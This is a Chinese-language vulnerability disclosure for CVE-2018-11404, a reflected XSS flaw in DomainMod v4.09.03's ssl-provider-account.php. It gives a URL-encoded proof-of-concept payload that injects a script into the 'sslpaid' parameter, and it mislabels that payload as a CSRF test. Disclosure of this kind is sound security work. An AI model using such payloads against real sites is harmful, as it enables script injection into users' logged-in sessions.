CVE中文申请站

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11404


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/15/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404
exploit-db:https://www.exploit-db.com/exploits/44783/

标签: none